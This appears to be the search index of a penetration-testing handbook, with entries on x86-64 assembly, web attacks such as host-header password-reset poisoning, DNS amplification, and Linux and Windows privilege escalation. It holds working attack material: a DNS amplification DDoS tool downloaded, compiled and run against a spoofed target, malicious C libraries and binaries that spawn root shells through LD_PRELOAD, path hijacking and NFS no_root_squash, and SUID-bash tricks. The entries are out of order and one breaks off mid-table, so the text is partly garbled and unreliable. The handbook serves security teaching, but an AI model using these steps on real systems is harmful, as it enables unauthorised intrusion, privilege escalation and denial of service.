Endianness","id":"333","title":"Endianness"},"334":{"body":"Below is the general memory layout of a programme: The reserved section is unavailable to user programmes. The .text sections stores the instructions which comprise the programme's code. Static variables which were declared and given a value at assemble-time are stored in the .data section. The .bss section stores static uninitialised data, i.e variables which were declared but were not provided with an initial value. If such variables are used before they are initialised, their value will be meaningless. The Stack and the Heap are where data can be allocated at run-time. The Stack is used for allocating space for small amounts of data with a size known at compile-time and grows from higher to lower addresses. Conversely, the Heap allows for the dynamic allocation of space for data of size known at run-time and grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Memory Layout","id":"334","title":"Memory Layout"},"335":{"body":"Registers are value containers which reside on the CPU (separately from RAM). They are small in size and some have special purposes. x86-64 assembly operates with 16 general-purpose registers (GPRs). It should be noted that the 8-byte (r) variants do not exist in 32-bit mode. 64-bit Register Lower 4 Bytes Lower 2 Bytes Lower 1 Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, the lower 16 bits of the rip register (instruction pointer) are inaccessible on their own. For example, the rax register could be set to the following: rax = 0x0000 000AB 10CA 07F0 The name eax would then only refer to the part of the rax register which contains 10CA 07F0. Similarly, ax would represent 07F0, and al would be just F0. Additionally, the upper byte of ax, bx, cx and dx may be separately accessed by means of the ah, bh, ch and dh monikers, which exist for legacy reasons.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Introduction","id":"335","title":"Introduction"},"336":{"body":"Not all registers available in the x86-64 paradigm are created equal. Certain registers are reserved for specific purposes, despite being called general-purpose.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Register Specialisation","id":"336","title":"Register Specialisation"},"337":{"body":"The stack pointer rsp (esp for 32-bit machines) is used to point to the current top of the stack and should not be used for any other purpose other than in instructions which involve stack manipulation.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Stack Pointer rsp","id":"337","title":"The Stack Pointer rsp"},"338":{"body":"The base pointer rbp (ebp for 32-bit machines) is the twin brother of the stack pointer and is used as a base pointer when calling functions. It points to the beginning of the current function's stack frame. Interestingly enough, its use is actually gratuitous because compilers can manage the stack frames of functions equally well without a separate base pointer. It is mostly used to make assembly code more comprehensible for humans.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Base Pointer rbp","id":"338","title":"The Base Pointer rbp"},"339":{"body":"The instruction pointer rip (eip for 32-bit machines) points to the next instruction to be executed. It is paramount not to get confused when using a debugger, since the rip does not actually point to the instruction currently being executed.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Instruction Pointer rip","id":"339","title":"The Instruction Pointer rip"},"34":{"body":"Notwithstanding its age, onesixtyone is a good tool which allows you to bruteforce community strings by specifying a file instead of a single string with its -c option. It's syntax is rather simple:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Bruteforce community strings with onesixtyone","id":"34","title":"Bruteforce community strings with onesixtyone"},"340":{"body":"The flag register rFlags (eFlags for 32-bit machines) is an isolated register which is automatically updated by the CPU after every instruction and is not directly accessible by programmes. Following is a table of the meaning assigned to different bits of this register. Note that only the lower 32 bits are used even on 64-bit machines. Name Symbol Bit Usage =1 =0 Carry CF 0 Indicates whether the previous operation resulted in a carry-over. CY (Carry) CN (No Carry) 1 Reserved. Always set to 1 for eFlags. Parity PF 2 Indicates whether the least significant byte of the previous instruction's result has an even number of 1's. PE (Parity Even) PO (Parity Odd) 3 Reserved. Auxiliary Carry AF 4 Used to support binary-coded decimal operations. AC (Auxiliary Carry) NA (No Auxiliary Carry) 5 Reserved. Zero ZF 6 Indicates whether the previous operation resulted in a zero. ZR (Zero) NZ (Not Zero) Sign SF 7 Indicates whether the most significant bit was set to 1 in the previous operation (implies a negative result in signed-data contexts). NG (Negative) PL (Positive) Trap TF 8 Used by debuggers when single-stepping through a programme. Interrupt Enable IF 9 Indicates whether or not the CPU should immediately respond to maskable hardware interrupts. EI (Enable Interrupt) DI (Disable Interrupt) Direction DF 10 Indicates the direction in which several bytes of data should be copied from one location to another. DN (Down) UP (Up) Overflow OF 11 Indicates whether the previous operation resulted in an integer overflow. OV (Overflow) NV (No Overflow) I/O Privilege Level IOPL 12-13 Nested Task NT 14 Mode MD 15 Resume RF 16 Virtual 8086 Mode VM 17 31-63 Reserved.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Flag Register rFlags","id":"340","title":"The Flag Register rFlags"},"341":{"body":"In addition to the aforementioned registers, the x86-64 paradigm includes 16 registers, xmm[0-15], which are used for 32- and 64-bit floating-point operations. Furthermore, the same registers are used to support the Streaming SIMD Extensions (SSE) which allow for the execution of Single Instruction Multiple Data (SIMD) instructions.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Floating-Point Registers and SSE","id":"341","title":"Floating-Point Registers and SSE"},"342":{"body":"The x86-64 assembly paradigm has quite a lot of different instructions available at its disposal. An instructions consists of an operation and a set of operands where the latter specify the data and the former specifies what is to be done to that data.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Instruction Set » Introduction","id":"342","title":"Introduction"},"343":{"body":"Typically, instruction signatures are represented using the following operand notation. Operand Notation Description Register operand. , , , Register operand with a specific size requirement. Source operand. Destination operand - this may be a register or memory location. Floating-point destination register operand. Immediate value (a literal). Base-10 by default, but can be preceded with 0x to make it hexadecimal. Memory location - a variable name or an address. Arbitrary operand - immediate value, register or memory location. .'\">View Me! Here, a new URL is generated based on the value of a parameter $val. Here, the attacker passes the value 123%26action=edit onto the parameter. The URL-encoded value for & is %26. When this gets to the htmlspecialchars function, the %26 gets converted to an &. When the URL gets formed, it becomes And since this is view as HTML, an additional parameter has been smuggled! The link would be equivalent to /page.php? action=view&par=123&action=edit This second action parameter could cause unexpected behaviour based on how the server handles duplicate requests.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Client-Side HPP","id":"147","title":"Client-Side HPP"},"148":{"body":"The HTTP Host header is a mandatory header for HTTP requests and specifies the domain name which the client wants to access. This is especially handy with virtual hosting because a single IP address may provide different services on different domains and the server needs to know which page to return to the client. For example, the same machine may serve a blog website at blog.example.com and a git repository at dev.example.com. In order to specify which of the two services the client wants to access, they must specify either the header Host: blog.example.com or dev.example.com, respectively, in their request. A host header injection vulnerability arises when the target application unsafely uses the contents of the Host header, typically in order to construct an absolute URL.","breadcrumbs":"Exploitation » Web » Host Header Injection » Introduction","id":"148","title":"Introduction"},"149":{"body":"This technique involves using Host Header Injection in order to force a vulnerable application to generate a password reset link which points to a malicious domain. This may be leveraged to steal the secret tokens required to reset the passwords of arbitrary users and consequently compromise their accounts. Typically applications implement password resetting as follows. The user specifies their username/email. The server generates a temporary, unique, high-entropy token for the user. The server generates a URL for the password reset with the secret token included as a URL parameter. For example, example.com/reset?token=abcdefghijklmnopqrstuvwxyz The server sends an email to the client which includes the generated password reset link. When the user clicks the link in their email, the token in the URL is used by server in order to determine whose password is being reset and whether or not it is a valid request. If the Host header of the request for a password reset is used in generating the password reset URL, an adversary may leverage it in order to steal the token for an arbitrary user. For example, an adversary could submit a password reset request for a user, e.g. carlos, intercept the request and modify the Host header to point to a domain controlled by them: Host: exploit-server.com. When the server generates the password reset URL, it will resemble the following, http://exploit-server.com/reset?token=abcdefghijklmnopqrstuvwxyz. If the victim clicks on the link, their token will be handed over to the attacker by means of the exploit-server.com domain which receives the password reset request. This type of attack, however, does not always require user interaction because emails are typically scanned be it to determine if they are spam or if they contain a virus and the scanners will oftentimes open the links themselves, all automatically, thus giving the attacker the token to reset the password.","breadcrumbs":"Exploitation » Web » Host Header Injection » Password Reset Poisoning","id":"149","title":"Password Reset Poisoning"},"15":{"body":"This is the process of discovering active hosts on a network, either for attacking them or assessing the overall network security.","breadcrumbs":"Reconnaissance » Enumeration » Network Scanning","id":"15","title":"Network Scanning"},"150":{"body":"Check to see if absolute URLs are necessary and cannot be replaced with relative ones. If an absolute URL is necessary, ensure that the current domain is stored in a configuration file and do NOT use the one from the Host: header. If using the Host header is inevitable, ensure that it is validated against a whitelist of permitted domains. Different frameworks may provide different methods for achieving this. Drop support for additional headers which may permit such attacks, such as the X-Forward-Host header. Do NOT virtual-host internal-only websites on a server which also provides public-facing content, since those may be accessed via manipulation of the Host header.","breadcrumbs":"Exploitation » Web » Host Header Injection » Prevention","id":"150","title":"Prevention"},"151":{"body":"","breadcrumbs":"Exploitation » Windows » Windows","id":"151","title":"Windows"},"152":{"body":"Shell Command Files (SCF) permit a limited set of operations and are executed upon browsing to the location where they are stored. What makes them interesting is the fact that they can communicate through SMB, which means that it is possible to extract NTLM hashes from Windows hosts. This can be achieved if you are provided with write access to an SMB share.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » Introduction","id":"152","title":"Introduction"},"153":{"body":"You will first need to create a malicious .scf file where you are going to write a simple (you can scarcely even call it that) script.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » The Attack","id":"153","title":"The Attack"},"154":{"body":"","breadcrumbs":"Exploitation » DNS » DNS","id":"154","title":"DNS"},"155":{"body":"A DNS (Traffic) Amplificaton attack is a popular form of a distributed denial of service (DDoS) attack, which abuses open DNS resolvers to flood a target system with DNS response traffic. It's called an amplification attack because it uses DNS responses to upscale the size of the data sent to the victim.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » What is DNS Traffic Amplification?","id":"155","title":"What is DNS Traffic Amplification?"},"156":{"body":"An attacker sends a DNS name lookup to an open resolver with the source IP spoofed to be the victim's IP address. That way, any response traffic would be sent to the victim and not the attacker. The requests submitted by the attacker usually aim to query for as much information as possible in order to maximise the amplification effect. In most cases, the queries sent are of type ANY which requests all known information about a particular DNS zone. Using a botnet, it's easy to create immense amounts of traffic. It is also rather difficult to protect against these attacks because the traffic is coming from legitimate sources - real DNS servers.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » How does it work?","id":"156","title":"How does it work?"},"157":{"body":"","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Conducting a DNS Traffic Amplification Attack","id":"157","title":"Conducting a DNS Traffic Amplification Attack"},"158":{"body":"We should first check if a DNS Traffic Amplification is possible and if it's viable. We can do this through Metasploit using the module auxiliary/scanner/dns/dns_amp. In the RHOSTS you need to put the IP of the name server you want to test. This module will tell you if a name server can be used in an amplification attack but won't actually execute the attack. Run the scanner:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Testing a DNS server for attack surface","id":"158","title":"Testing a DNS server for attack surface"},"159":{"body":"A simple tool is available only as a proof of concept here . You will need to download and then compile it: wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c gcc -o dnsdrdos dnsdrdos.c -Wall -ansi ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\n--2021-09-21 13:01:11-- https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 15109 (15K) [text/plain]\nSaving to: ‘dnsdrdos.c’ dnsdrdos.c 100%[========================================================================================================================================>] 14.75K --.-KB/s in 0.001s 2021-09-21 13:01:11 (17.9 MB/s) - ‘dnsdrdos.c’ saved [15109/15109] ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ gcc -o dnsdrdos dnsdrdos.c -Wall -ansi Now, create a file containing the IP's of each DNS server you want to use in the attack (only one IP per line). Use the following syntax to run the attack: sudo ./dnsdrdos -f -s -d -l ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ sudo ./dnsdrdos -f dns_servers -s 192.168.129.2 -d nsa.gov -l 30\n----------------------------------------------- dnsdrdos - by noptrix - http://www.noptrix.net/ ----------------------------------------------- ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ The output may be empty, but the packets were sent. You can verify this with wireshark:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Executing the attack","id":"159","title":"Executing the attack"},"16":{"body":"Reveals the presence of known vulnerabilities. It checks whether a system is exploitable through a set of weaknesses. Such a scanner consists of a catalog and a scanning engine. The catalog contains information about known vulnerabilities and exploits for them that work on a multitude of servers. The scanning engine is responsible for the logic behind the exploitation and analysis of the results.","breadcrumbs":"Reconnaissance » Enumeration » Vulnerability Scanning","id":"16","title":"Vulnerability Scanning"},"160":{"body":"A flaw of all DNS name servers is that if they contain incorrect information, they may spread it to clients or other name servers. Each DNS name server (even individual clients) has a DNS cache. The system stores there information about any responses it gets for domains it requested. An attacker could inject false entries in this cache and as such, any computer which queries the poisoned name server will receive false results. This is known as DNS cache poisoning . The attack can be used to redirect users to a different website than the requested one. As such, it opens opportunities for phishing attacks by creating evil twins of login portals for well-known sites. A tool for performing such targeted attacks is deserter . Usage information is available on its GitHub page.","breadcrumbs":"Exploitation » DNS » DNS Cache Poisoning » Introduction","id":"160","title":"Introduction"},"161":{"body":"","breadcrumbs":"Post Exploitation » Post Exploitation","id":"161","title":"Post Exploitation"},"162":{"body":"","breadcrumbs":"Post Exploitation » Privilege Escalation » Introduction","id":"162","title":"Introduction"},"163":{"body":"The first thing you need to do after gaining a foothold on a machine is to look for reused credentials. You should try every password you have gathered on all users, you never know when you might find an easy escalation to root. Next, you should hunt down sensitive files and look for stored credentials in configuration and source files of different applications. Naturally, you should also enumerate any local databases you find. Additionally, SSH keys are something to be on the lookout for. You should also go through the bash history and look for any passwords which were passed as command-line arguments. You should then move on to looking for exploits. Kernel exploits are really low-hanging fruit, so you should always check the kernel version. Subsequently, proceed by enumerating sudo and the different ways to exploit it, for example via Shell Escape Sequences or LD_PRELOAD . Following, you should proceed by tracking down any misconfigurations such as excessive capabilities or SUID Binaries . You should check if you have write access to any sensitive files such as /etc/passwd or /etc/shadow, as well as any cron jobs or cron job dependencies. Ultimately, you should move on to enumerating running software and services which are executed as root and try to find vulnerabilities in them which may allow for privilege escalation. This can all be summed up into the following: Credentials Reused Credentials Credentials in Configuration or Source Files Credentials from Databases Credentials in Sensitive Files Credentials from Bash History SSH Keys Exploitation Kernel Exploits Sudo Misconfigurations Excessive Capabilities SUID/SGID Binaries Write Access to Sensitive Files Writable Cron Jobs and Cron Job Dependencies Installed Software Vulnerabilities in Software and Services Running as Root","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Methodology","id":"163","title":"Methodology"},"164":{"body":"The Set Owner User ID (SUID) and Set Group ID (SGID) are special permissions which can be attributed to Linux files and folders. Any files which are owned by root and have SUID set will be executed with elevated privileges. Our goal is to hunt down those files and abuse them in order to escalate our privileges. This can be easily done with the following command: find / -perm -u=s -type f -user root 2>/dev/null","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Introduction","id":"164","title":"Introduction"},"165":{"body":"You should diligently inspect the list of files returned. Some standard Linux binaries may allow for privilege escalation if they have the SUID bit set for one reason or another. It is useful to go through these binaries and check them on GTFOBins . In the above example, we find that /bin/systemctl has the SUID bit set and that it also has an entry in GTFOBins : By following the instructions, although with slight modifications, we can run commands with elevated privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Exploiting Misconfigured Common Binaries","id":"165","title":"Exploiting Misconfigured Common Binaries"},"166":{"body":"Some binaries may be vulnerable to Shared Object (SO) Injection. This typically stems from misconfigurations where the binary looks for a specific library in a specific directory, but can't actually find it. If we have write access to this directory, we can hijack the search for the library by compiling our own malicious library in the place where the original one was supposed to be. This is quite similar to escalating via LD_PRELOAD , but it is a bit more difficult to find and exploit. You will first need to identify an SUID binary which has misconfigured shared libraries. A lot of the times the binary will refuse to run, saying that it is missing a particular library, however, this is not always the case: It is always good practice to run the programme with strace, which will print any attempts of the binary to access libraries: strace 2>&1 | grep -iE \"open|access\" What stands out in particular is the /home/user/.config/libcalc.so library, since /home/user/.config/ may be a writable directory. It turns out that the directory doesn't even exist, however, we can write to /home/user/ which means that we can create it. What now remains is to compile a malicious library into libcalc.so. #include \n#include static void inject() __attribute__((constructor)); void inject()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} For older versions of GCC, you may need to use the _init() function syntax: #include \n#include void _init()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} Compile the malicious library: gcc -shared -fPIC -o libcalc.so libcalc.c # add -nostartfiles if using _init()","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Shared Object Injection","id":"166","title":"Privilege Escalation via Shared Object Injection"},"167":{"body":"Path Hijacking refers to the deliberate manipulation of environmental variables, most commonly \\$PATH, such that the invocations of programmes in a binary actually refer to malicious binaries and not the intended ones. This vector requires more sophisticated digging into the internals of an SUID binary, specifically tracking down the different invocations the binary performs. This can commonly be achieved by running strings on the binary, but you will probably have to resort to more serious reverse engineering, as well. Specifically, you want to be on the lookout for shell commands which get executed by the SUID binary.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Path Hijacking","id":"167","title":"Privilege Escalation via Path Hijacking"},"168":{"body":"Relative paths are comparably easy to hijack - they require little other than editing the \\$PATH variable. Once you have identified a shell command within an SUID binary which invokes another programme via a relative path, you can just prepend to the \\$PATH a directory which will contain an executable with the same name as the one originally invoked. Let's compile our own malicious binary. #include \n#include int main()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\"); return 0;\n} gcc -o /tmp/service /tmp/service.c Afterwards, we need to prepend /tmp to the \\$PATH variable: export PATH=/tmp:\\$PATH And finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Relative Paths","id":"168","title":"Hijacking Relative Paths"},"169":{"body":"Absolute paths require a bit more work to be hijacked. Luckily, bash turns out to be very sophisticated and allows for the creation of functions which have the forward slash (/) character in their name. This means that we can create a malicious bash function with the same name as the absolute path we want to hijack and then our function will be invoked in lieu of the original programme. First, create the bash function: function () { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; } Next, export the function: export -f Finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Absolute Paths","id":"169","title":"Hijacking Absolute Paths"},"17":{"body":"All services which need to somehow interface with the network a host is connected to run on ports and port scanning allows us to enumerate them in order to gather information such as what service is running, which version of the service is running, OS information, etc. Warning Port scanning is very heavy on network bandwidth and generates a lot of traffic which can cause the target to slow down or crash altogether. During a penetration test, you should always inform the client when you are about to perform a port scan. Danger Port scanning without prior written permission from the target may be considered illegal in some jurisdictions. The de-facto standard port scanner is nmap , although alternatives such as masscan and RustScan do exist. Info A lot of nmap's techniques require elevated privileges, so it is advisable to always run the tool with sudo.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Introduction","id":"17","title":"Introduction"},"170":{"body":"The kernel is the layer which sits between applications and the hardware. It runs with root privileges, so if it gets exploited, privileges can be escalated. Finding kernel vulnerabilities and writing exploits for them is no trifling task, however, once such a vulnerability is made public and exploit code for it is developed, it easily becomes a low-hanging fruit for escalating privileges. A very useful list of kernel exploits found to date is located here . Finding already existing exploits is really easy - just search for the Linux kernel version!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Introduction","id":"170","title":"Introduction"},"171":{"body":"As an example, we are going to exploit dirtyc0w. This was a very ubiquitous exploit and can still be found on numerous outdated machines. The exploit itself has many versions but for demonstration purposes we are going to use the one at https://www.exploit-db.com/exploits/40839 . We need to first verify that our kernel version is in the vulnerable range. Inside the exploit we see compilation instructions, which is typical of kernel exploits as they are usually written in C: By compiling and running the exploit (it may actually take some time to execute), we have elevated our privileges!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Exploiting the Kernel","id":"171","title":"Exploiting the Kernel"},"172":{"body":"It is common to see a low-privileged user to be configured to be able to run some commands via sudo without a password. Luckily, many existing programmes for Linux have advanced capabilities which allow them to do many things such as spawning a shell when run with sudo. If such a programme is configured in the aforementioned way, then there is a shell escape sequence which is a (usually) simple command/argument passed to the programme when run, so that it spawns a shell with elevated privileges when run with sudo. Naturally, these shell escape sequences are programme-specific and it would be inane to try and remember the sequence for every binary. This is where GTFOBins comes in. This is a database of commands (including shell escape sequences) for common Linux binaries which can be used for escalating privileges. We saw in the above list provided by sudo -l that we are allowed to run find as root via sudo. Let's check if there is a shell escape sequence for it. There is! We can copy and paste it, then run it with sudo, and we should at last have a root shell: Another example can be given with the awk binary, which we also saw in the list provided by sudo -l.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Shell Escape Sequences » Introduction","id":"172","title":"Introduction"},"173":{"body":"The compromised machine may be configured to allow certain directories to be mounted by other machines. You can enumerate such directories by running the following command on the victim machine: cat /etc/exports You can additionally verify this from your attacker machine by running: showmount -e If there is a mountable directory which is configured as no_root_squash, as is the case here, then it can be used for privilege escalation. We begin by mounting the target directory from the victim to a directory on our machine: sudo mount -o rw, vers=3 :/tmp /tmp/root_squash Now, if no_root_sqaush is configured for the mountable directory, then the root user on the attacker machine will get mirrored on the victim machine. In essence, any command run as root on the attacker machine, will also be executed as root on the victim! This can allow us to create a malicious binary in the mounted directory and set its SUID bit from the attacker machine. This action will be mirrored by the victim and we will essentially have an SUID binary on the target which is all under our control. Let's write a simple malicious C executable: #include \n#include int main()\n{ setuid(0); // Set user ID to root setgid(0); // Set group ID to root system(\"/bin/bash -i\"); // Execute bash now with elevated privileges return 0;\n} It doesn't matter if you create it on the target or the attacker machine, but you must compile it on the target machine in order to avoid library version mismatches: gcc -o nfs_exploit nfs_exploit.c Next, you want to change the ownership of the compiled binary to root on the attacker machine . Afterwards, you want to set the SUID bit on the binary, once again, from the attacker machine : sudo chown root:root nfs_exploit\nsudo chmod +s nfs_exploit Finally, execute the malicious binary on the target :","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » NFS Root Squashing » Introduction","id":"173","title":"Introduction"},"174":{"body":"Linux capabilities provide a way for splitting permissions into small units. A binary with particular capabilities can perform certain tasks with elevated privileges. If capabilities are not properly set, or if they are excessive, this may lead to privilege escalation. Binaries with capabilities may be found using the following command: getcap / -r 2>/dev/null A list of all possible capabilities can be found here . In the above example, we can see that the python interpreter can arbitrarily set the user ID of the process. This means that we can change our user ID to 0 when running python, thus escalating our privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing Linux Capabilities » Introduction","id":"174","title":"Introduction"},"175":{"body":"The LD_PRELOAD environment variable can be used to tell the dynamic linker to load specific libraries before any others. By default, programmes run with sudo will be executed in a clean, minimal environment which is specified by env_reset when running sudo -l. However, env_keep may be used to inherit some environment variables from the parent process. If LD_PRELOAD is specified together with env_keep, then we can compile our own malicious dynamic library and set LD_PRELOAD to it. Therefore, when we execute a binary with sudo, our library will be loaded before any other library and its initialisation function will be invoked with root permissions.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Introduction","id":"175","title":"Introduction"},"176":{"body":"Writing the library is a fairly simple task. All we need to do is write an _init function in a C file. This procedure will contain the code we want to be executed when the library is loaded. #include \n#include \n#include void _init()\n{ unsetenv(\"LD_PRELOAD\"); // Unset LD_PRELOAD to avoid an infinite loop setgid(0); // Set root permissions setuid(0); // Set root permissions system(\"/bin/bash\");\n} We begin by unsetting the LD_PRELOAD variable from the environment. This is to preclude an infinite loop when /bin/bash is invoked. If our library didn't unset LD_PRELOAD, then when /bin/bash is called, our library will again be loaded first and then proceed onto launching /bin/bash yet again, which will again load our library and so on. The next two lines set the user and group IDs to those of root which ensures that the next commands are run with root privileges. Finally, system is called in order to spawn a bash shell. We now need to compile this file as a shared library: gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles At last, we can invoke any binary with sudo and specify the path to our library as LD_PRELOAD. Note that the path to the library must be specified as an absolute path.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Writing the Malicious Library","id":"176","title":"Writing the Malicious Library"},"177":{"body":"Once you have gained access to a system, it is paramount to look for other credentials which may be located on the system. These may be hidden in the Windows Registry, within log or configuration files, and more. Moreover, you should check to see if any credentials you have previously found work with anything else. You should also check if you have access to the Windows SYSTEM or SAM files or any of their backups, since those will contain the hashes for users on the system. If so, you might be able to perform a pass-the-hash attack or simply crack them. If the compromised system is a Windows Server, you should look for any stored credentials which can be used with RunAs. You should check the Windows build and version, see if there are any kernel exploits available. You should then move onto enumerating misconfigurations in services and other Windows-specific vectors. If none of these bear any fruit, you should look at the programmes installed on the system, enumerate them for misconfigurations, explore their versions and any exploits which may be available. If none are found, you might consider reverse engineering and binary exploitation as a last resort. Finally, if you have gained access as a local administrator, you should proceeding to looking for ways to bypass UAC . In essence: Credentials Reused Credentials Credentials in Configuration or Log files Credentials in the Windows Registry Credentials from Windows SAM and SYSTEM files Pass-the-hash attacks Stored Credentials (Windows Servers) Kernel Exploits Misconfigurations Services AutoRuns Startup Applications Scheduled Tasks AlwaysInstallElevated Group Policy Bypassing UAC","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Methodology","id":"177","title":"Methodology"},"178":{"body":"Windows Services allow for the creation of continuously running executable applications. These applications have the ability to be automatically started upon booting, they may be paused and restarted, and they lack a user interface. In order for a service to function properly, it needs to be associated with a system or user account. There are a few common built-in system accounts that are used to operate services such as LocalService, NetworkService, and LocalSystem. The following table describes the default secure access rights for accounts on a Windows system: Account Permissions Local Authenticated Users (including LocalService and Network Service) READ_CONTROL SERVICE_ENUMERATE DEPENDENTS SERVICE_INTERROGATE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_USER_DEFINED_CONTROL Remote Authenticated Users Same as those for Local Authenitcated Users. LocalSystem READ_CONTROL SERVICE_ENUMERATE DEPENDENTS SERVICE_INTERROGATE SERVICE_PAUSE_CONTINUE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_START SERVICE_STOP SERVICE_USER_DEFINED_CONTROL Administrators DELETE READ_CONTROL SERVICE_ALL_ACCESS WRITE_DAC WRITE_OWNER Moreover, a registry entry exists for each service in HKLM\\SYSTEM\\CurrentControlSet\\Services.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Introduction","id":"178","title":"Introduction"},"179":{"body":"In general, manual enumeration of Windows services is a rather cumbersome process, so I suggest that you use a tool for automation such as WinPEAS . winpeas.exe servicesinfo The permissions a user has on a specific service can be inspected via the AccessChk Windows Utility. acceschk.exe /accepteula -uwcqv ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Enumeration","id":"179","title":"Enumeration"},"18":{"body":"There are two types of ports depending on the transport-layer protocol that they support. Both TCP and UDP ports range from 0 to 65535 but they are completely separate. For example, DNS uses UDP port 53 for queries but it uses TCP port 53 for zone transfers. To scan UDP ports, nmap requires elevated privileges and the -sU flag. nmap -sU Note Due to the nature of the protocol, UDP scanning takes a lot longer than TCP does.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP vs UDP","id":"18","title":"TCP vs UDP"},"180":{"body":"This is a vulnerability which can be used to force a misconfigured service to execute an arbitrary programme in lieu of its intended one, as long as the path to that executable contains spaces. On its own, this does not allow for privilege escalation, but it becomes a really powerful tool when the misconfigured service is set to run with system privileges. Let's take a look at the following path: C:\\Program Files\\Vulnerable Service\\service.exe If this path was specified to the service in quotation marks, \"C:\\Program Files\\Vulnerable Service\\service.exe\", then Windows will treat it correctly, executing the service.exe file in the C:\\Program Files\\Vulnerable Service directory. However, Windows is not the sharpest tool in the box and if the path is provided without quotation marks, then it will see ambiguity in what it is supposed to execute. The path will be split at each space character - the first segment will be treated as the executable's name and the rest will be seen as command-line arguments to be passed to it. So at first, Windows will try to execute the following: C:\\Program.exe Files\\Vulnerable Service\\service.exe Once Windows determines that the C:\\Program.exe file does not exist, it will look for the next space character, treat the characters up to it as the new path and try to execute it again: C:\\Program Files\\Vulnerable.exe Service\\service.exe Now, this is process is recursive until a file is successfully executed or the end of the path has been reached. If we are able to create a malicious executable in any of the possible paths that Windows will traverse, then we can hijack the service before the intended file is found. Once you have identified a vulnerable service, you can query to confirm that the path is indeed unquoted. Let's check our access to the possible directories that will be probed by Windows: accesschk.exe /accepteula -uwdq While we cannot write within the C:\\ or C:\\Program Files directories (meaning that we cannot create C:\\Program.exe or C:\\Program Files\\Unquoted.exe), we do have write access to C:\\Program Files\\Unquoted Path Service\\. What this entails is our ability to create a Common.exe binary inside this directory and, since the initial path was unquoted, the path C:\\Program Files\\Unquoted Path Service\\Common.exe will be probed before C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe and once Windows finds our malicious executable there, it will be executed with the service's permissions. If we couldn't restart the service, then we could have simply waited for something else to execute it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Unquoted Service Paths » Unquoted Service Paths","id":"180","title":"Unquoted Service Paths"},"181":{"body":"As previously mentioned, each service is associated with a registry entry in the Windows Registry which is located at HKLM\\SYSTEM\\CurrentControlSet\\Services\\. This entry is essentially the configuration of the service and if it is writable, then it can be abused by an adversary to overwrite the path to the binary application of the service with a 